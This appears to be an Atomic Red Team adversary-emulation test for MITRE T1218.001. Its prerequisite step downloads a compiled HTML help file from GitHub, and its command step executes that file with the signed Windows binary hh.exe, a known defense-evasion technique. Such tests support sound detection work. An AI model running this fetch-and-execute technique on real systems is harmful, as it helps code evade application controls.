#TechniqueName: Signed Binary Proxy Execution: Compiled HTML File
#AtomicTestName: Compiled HTML Help Local Payload
#Language: cmd

#get_prereq_commands
New-Item -Type Directory (split-path PathToAtomicsFolder\T1218.001\src\T1218.001.chm) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "PathToAtomicsFolder\T1218.001\src\T1218.001.chm"


#prereq_commands
if (Test-Path PathToAtomicsFolder\T1218.001\src\T1218.001.chm) {exit 0} else {exit 1}


#commands
hh.exe PathToAtomicsFolder\T1218.001\src\T1218.001.chm

